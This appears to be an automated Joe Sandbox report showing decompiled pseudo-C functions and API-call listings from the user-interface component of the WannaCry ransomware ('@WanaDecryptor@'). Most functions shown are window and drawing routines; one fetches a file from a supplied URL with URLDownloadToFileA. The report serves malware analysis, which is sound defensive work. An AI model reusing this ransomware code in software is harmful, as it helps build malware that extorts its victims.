                                                      				_t15 = GetParent( *(__ecx + 0x20));
                                                      				_push(_t15);
                                                      				L00412DAC();
                                                      				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
                                                      				_push(_t10);
                                                      				L00412DE2();
                                                      				if(_t10 != 0) {
                                                      					goto L2;
                                                      				}
                                                      				return _t10;
                                                      			}









                                                      APIs
                                                      • GetParent.USER32(?), ref: 004044D2
                                                      • #2864.MFC42(00000000), ref: 004044D9
                                                      • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                      • #2860.MFC42(00000000), ref: 004044EF
                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                      • CreateFontIndirectA.GDI32(?), ref: 00404513
                                                      • #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 2724197214-0
                                                      • Opcode ID: 0d29f9984c210a8c1ae4b749a0bb5da7fb9748feab07b3c4822df2c82d6e9902
                                                      • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                                      • Opcode Fuzzy Hash: 0d29f9984c210a8c1ae4b749a0bb5da7fb9748feab07b3c4822df2c82d6e9902
                                                      • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E0040C060(void* __ecx, void* __eflags) {
                                                      				void* _t35;
                                                      				int _t45;
                                                      				struct HWND__* _t56;
                                                      				signed int _t58;
                                                      				int _t59;
                                                      				intOrPtr* _t65;
                                                      				intOrPtr* _t69;
                                                      				intOrPtr* _t70;
                                                      				intOrPtr* _t73;
                                                      				intOrPtr* _t75;
                                                      				struct HWND__* _t87;
                                                      				intOrPtr _t92;
                                                      				void* _t93;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004142BB);
                                                      				 *[fs:0x0] = _t92;
                                                      				E00413060(0x2408, __ecx,  *[fs:0x0]);
                                                      				_push(_t58);
                                                      				E0040DBB0(_t92 + 0x18, 0x1000);
                                                      				 *(_t92 + 0x241c) = 0;
                                                      				_push(_t92 + 0x14);
                                                      				_t59 = _t58 | 0xffffffff;
                                                      				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
                                                      				_t93 = _t92 + 0x10;
                                                      				if(_t35 == 0) {
                                                      					_t87 =  *(_t93 + 0x2430);
                                                      					if(_t87 != 0) {
                                                      						SendMessageA(_t87, 0x4e20, 0, 0);
                                                      					}
                                                      					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
                                                      					_t65 =  *0x422210; // 0xb828e8
                                                      					_push(0);
                                                      					_push(E0040DD40(_t93 + 0x1c));
                                                      					_push(E0040DD30(_t93 + 0x20));
                                                      					_push(7);
                                                      					if( *((intOrPtr*)( *_t65 + 0x18))() >= 0) {
                                                      						if(_t87 != 0) {
                                                      							SendMessageA(_t87, 0x4e21, 0, 0);
                                                      						}
                                                      						_t69 =  *0x422210; // 0xb828e8
                                                      						_push(_t93 + 0x10);
                                                      						_push(_t93 + 0x102c);
                                                      						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
                                                      						_push(_t93 + 0x17);
                                                      						if( *((intOrPtr*)( *_t69 + 0x1c))() >= 0) {
                                                      							if( *((char*)(_t93 + 0xf)) == 7) {
                                                      								_t59 = 0;
                                                      							}
                                                      							if(_t87 != 0) {
                                                      								SendMessageA(_t87, 0x4e22, _t59, 0);
                                                      							}
                                                      							_t70 =  *0x422210; // 0xb828e8
                                                      							 *((intOrPtr*)( *_t70 + 0xc))();
                                                      							 *(_t93 + 0x241c) = 0xffffffff;
                                                      							goto L21;
                                                      						} else {
                                                      							if(_t87 != 0) {
                                                      								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
                                                      							}
                                                      							_t73 =  *0x422210; // 0xb828e8
                                                      							 *((intOrPtr*)( *_t73 + 0xc))();
                                                      							 *(_t93 + 0x241c) = 0xffffffff;
                                                      							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                                      						}
                                                      					} else {
                                                      						if(_t87 != 0) {
                                                      							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
                                                      						}
                                                      						_t75 =  *0x422210; // 0xb828e8
                                                      						 *((intOrPtr*)( *_t75 + 0xc))();
                                                      						 *(_t93 + 0x241c) = 0xffffffff;
                                                      						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                                      					}
                                                      				} else {
                                                      					_t56 =  *(_t93 + 0x2430);
                                                      					if(_t56 != 0) {
                                                      						SendMessageA(_t56, 0x4e20, _t59, 0);
                                                      					}
                                                      					 *(_t93 + 0x241c) = _t59;
                                                      					L21:
                                                      					E0040DBF0(_t93 + 0x14);
                                                      					_t45 = _t59;
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
                                                      				return _t45;
                                                      			}

















                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823
                                                      • String ID:
                                                      • API String ID: 3019263841-0
                                                      • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                                      • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
                                                      				signed int _v0;
                                                      				char _v4;
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				signed int _t29;
                                                      				intOrPtr _t31;
                                                      				long _t36;
                                                      				intOrPtr _t38;
                                                      				intOrPtr* _t41;
                                                      				struct HWND__* _t47;
                                                      				intOrPtr _t48;
                                                      				long _t53;
                                                      				struct HWND__* _t58;
                                                      				signed int _t60;
                                                      				intOrPtr* _t67;
                                                      				signed int _t68;
                                                      
                                                      				_t67 = __ecx;
                                                      				L00412FE6();
                                                      				_t68 = __eax;
                                                      				if((__eax & 0x00008000) != 0) {
                                                      					_push( &_v8);
                                                      					_push( &_v4);
                                                      					L00412FFE();
                                                      					if(_a4 == 0) {
                                                      						_t60 = _v0;
                                                      						_t41 = _v16;
                                                      					} else {
                                                      						_t58 =  *(__ecx + 0x20);
                                                      						_t36 = SendMessageA(_t58, 0x408, 0, 0);
                                                      						_t41 = _v16;
                                                      						_t53 = _t36;
                                                      						if(_t53 == _t41) {
                                                      							_t38 =  *((intOrPtr*)(_t67 + 0x68));
                                                      							_t58 =  *(_t67 + 0x6c);
                                                      							if(_t53 - _t38 < _t58) {
                                                      								_t53 = _t58 + _t38;
                                                      							}
                                                      						}
                                                      						asm("cdq");
                                                      						_t60 = (_v0 ^ _t58) - _t58 + _t53;
                                                      					}
                                                      					_t47 =  *(_t67 + 0x6c);
                                                      					_t29 = _t47 + _t41;
                                                      					if(_t60 <= _t29) {
                                                      						if(_t60 >= _t41) {
                                                      							InvalidateRect( *(_t67 + 0x20), 0, 1);
                                                      						}
                                                      					} else {
                                                      						_t60 = _t60 + _v12 - _t47 - _t41;
                                                      						if(_t60 > _t29) {
                                                      							_t60 = _t29;
                                                      						}
                                                      						_push(0);
                                                      						if((_t68 & 0x00004000) == 0) {
                                                      							_push(0x4000);
                                                      							_push(0);
                                                      							L00412DDC();
                                                      						} else {
                                                      							_push(0);
                                                      							_push(0x4000);
                                                      							L00412DDC();
                                                      						}
                                                      					}
                                                      					_t48 = _v12;
                                                      					_t31 = _t60 -  *(_t67 + 0x6c);
                                                      					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
                                                      					if(_t31 < _t48) {
                                                      						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
                                                      					}
                                                      					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
                                                      					return 1;
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}





















                                                      APIs
                                                      • #3797.MFC42 ref: 00409C27
                                                      • #6734.MFC42(?,?), ref: 00409C4E
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                                      • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3797#4284#6734MessageSend
                                                      • String ID:
                                                      • API String ID: 1776784669-0
                                                      • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                                      • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				void* _v4;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v24;
                                                      				void* __ebx;
                                                      				intOrPtr* _t21;
                                                      				intOrPtr* _t23;
                                                      				intOrPtr _t25;
                                                      				intOrPtr _t26;
                                                      				intOrPtr* _t33;
                                                      				signed int _t42;
                                                      				unsigned int _t44;
                                                      				signed int _t45;
                                                      				void* _t53;
                                                      				intOrPtr _t65;
                                                      				void* _t67;
                                                      				intOrPtr _t68;
                                                      				void* _t69;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041438B);
                                                      				_t21 =  *[fs:0x0];
                                                      				_push(_t21);
                                                      				 *[fs:0x0] = _t68;
                                                      				_push(__ecx);
                                                      				_push(0x244);
                                                      				L00412CEC();
                                                      				_t33 = _t21;
                                                      				_t69 = _t68 + 4;
                                                      				_v16 = _t33;
                                                      				_t53 = 0;
                                                      				_v4 = 0;
                                                      				if(_t33 == 0) {
                                                      					_t33 = 0;
                                                      				} else {
                                                      					_t65 = _a16;
                                                      					 *_t33 = 0;
                                                      					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                                      					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
                                                      					if(_t65 != 0) {
                                                      						asm("repne scasb");
                                                      						_t42 =  !(__ecx | 0xffffffff);
                                                      						_push(_t42);
                                                      						L00412CEC();
                                                      						 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                                      						asm("repne scasb");
                                                      						_t44 =  !(_t42 | 0xffffffff);
                                                      						_t67 = _t65 - _t44;
                                                      						_t45 = _t44 >> 2;
                                                      						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
                                                      						_t69 = _t69 + 0x1c;
                                                      						_t53 = 0;
                                                      					}
                                                      				}
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_v4 = 0xffffffff;
                                                      				_t23 = E00411C00(_t33);
                                                      				 *0x4220dc = _t23;
                                                      				if(_t23 == _t53) {
                                                      					_push(8);
                                                      					L00412CEC();
                                                      					 *_t23 = 1;
                                                      					 *((intOrPtr*)(_t23 + 4)) = _t33;
                                                      					 *[fs:0x0] = _v24;
                                                      					return _t23;
                                                      				} else {
                                                      					if(_t33 != _t53) {
                                                      						_t25 =  *((intOrPtr*)(_t33 + 0x138));
                                                      						if(_t25 != _t53) {
                                                      							_push(_t25);
                                                      							L00412C98();
                                                      							_t69 = _t69 + 4;
                                                      						}
                                                      						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
                                                      						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
                                                      						if(_t26 != _t53) {
                                                      							_push(_t26);
                                                      							L00412C98();
                                                      							_t69 = _t69 + 4;
                                                      						}
                                                      						_push(_t33);
                                                      						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
                                                      						L00412C98();
                                                      						_t69 = _t69 + 4;
                                                      					}
                                                      					 *[fs:0x0] = _v24;
                                                      					return 0;
                                                      				}
                                                      			}


                                                      APIs
                                                      • #823.MFC42(00000244,?,0019FA30,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                                      • #823.MFC42(?,?,?), ref: 00412849
                                                      • #825.MFC42(?), ref: 004128B5
                                                      • #825.MFC42(?), ref: 004128CE
                                                      • #825.MFC42(00000000), ref: 004128DD
                                                      • #823.MFC42(00000008), ref: 004128FA
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825
                                                      • String ID:
                                                      • API String ID: 89657779-0
                                                      • Opcode ID: 1ad6e18a2d076e9d7f2fcb99b27d1d1a93800b7b37bec87adbc1dae2b27ad58d
                                                      • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                                      • Opcode Fuzzy Hash: 1ad6e18a2d076e9d7f2fcb99b27d1d1a93800b7b37bec87adbc1dae2b27ad58d
                                                      • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 61%
                                                      			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
                                                      				intOrPtr _v12;
                                                      				void _v259;
                                                      				char _v260;
                                                      				char _v264;
                                                      				char _v284;
                                                      				char _t15;
                                                      				int _t19;
                                                      				CHAR* _t25;
                                                      				signed int _t26;
                                                      				char* _t40;
                                                      
                                                      				_t26 = __ecx;
                                                      				_t25 = _a4;
                                                      				CreateDirectoryA(_t25, 0);
                                                      				_t40 = _a8;
                                                      				asm("repne scasb");
                                                      				if( !(_t26 | 0xffffffff) == 1) {
                                                      					L4:
                                                      					return 0;
                                                      				} else {
                                                      					_t15 =  *0x421798; // 0x0
                                                      					_v260 = _t15;
                                                      					memset( &_v259, 0, 0x40 << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					GetTempFileNameA(_t25, "t", 0,  &_v260);
                                                      					_t19 = DeleteUrlCacheEntry(_t40);
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push( &_v264);
                                                      					_push(_t40);
                                                      					_push(0);
                                                      					L004133CE();
                                                      					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
                                                      						DeleteFileA( &_v284);
                                                      						goto L4;
                                                      					} else {
                                                      						DeleteFileA( &_v284);
                                                      						return 1;
                                                      					}
                                                      				}
                                                      			}



                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,0019FA30), ref: 0040B793
                                                      • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                      • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,0019FA30), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                                      • String ID:
                                                      • API String ID: 361195595-0
                                                      • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                                      • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00409A40(signed int* _a4, intOrPtr _a8) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr* _v24;
                                                      				struct tagRECT _v40;
                                                      				intOrPtr _v56;
                                                      				intOrPtr _v64;
                                                      				char _v68;
                                                      				intOrPtr _v88;
                                                      				intOrPtr _t34;
                                                      				void* _t35;
                                                      				void* _t53;
                                                      				intOrPtr _t56;
                                                      
                                                      				 *[fs:0x0] = _t56;
                                                      				_v40.right = 0;
                                                      				_v40.top = 0x41679c;
                                                      				_v4 = 0;
                                                      				E00409D40( &(_v40.bottom), _a4, _a8);
                                                      				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
                                                      				L00412D5E();
                                                      				L00413010();
                                                      				_t34 =  *_v24;
                                                      				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
                                                      				L00412D52();
                                                      				_v88 = 0x415c00;
                                                      				_v56 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v64;
                                                      				return _t35;
                                                      			}














                                                      APIs
                                                      • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                                      • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                                      • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                                      • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414Rect$#1641#5781CreateOffset
                                                      • String ID:
                                                      • API String ID: 2675356817-0
                                                      • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                                      • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E004034A0(void* __ecx) {
                                                      				intOrPtr _v0;
                                                      				int _v8;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v72;
                                                      				char* _t20;
                                                      				int _t23;
                                                      				void* _t45;
                                                      				intOrPtr _t48;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413620);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t48;
                                                      				_t45 = __ecx;
                                                      				GetClientRect( *(__ecx + 0x20),  &_v28);
                                                      				_push( *((intOrPtr*)(_t45 + 0xe8)));
                                                      				L00412D76();
                                                      				_t20 =  &_v40;
                                                      				_push(_t20);
                                                      				_v8 = 0;
                                                      				L00412D70();
                                                      				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                                      				_push(_t20);
                                                      				L00412D70();
                                                      				_v72 = 0x415c00;
                                                      				_v40 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t23;
                                                      			}















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                                      • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00406940(void* __ecx) {
                                                      				intOrPtr _v0;
                                                      				int _v8;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v72;
                                                      				char* _t20;
                                                      				int _t23;
                                                      				void* _t45;
                                                      				intOrPtr _t48;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E30);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t48;
                                                      				_t45 = __ecx;
                                                      				GetClientRect( *(__ecx + 0x20),  &_v28);
                                                      				_push( *((intOrPtr*)(_t45 + 0x824)));
                                                      				L00412D76();
                                                      				_t20 =  &_v40;
                                                      				_push(_t20);
                                                      				_v8 = 0;
                                                      				L00412D70();
                                                      				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                                      				_push(_t20);
                                                      				L00412D70();
                                                      				_v72 = 0x415c00;
                                                      				_v40 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t23;
                                                      			}















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                                      • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                                      Uniqueness

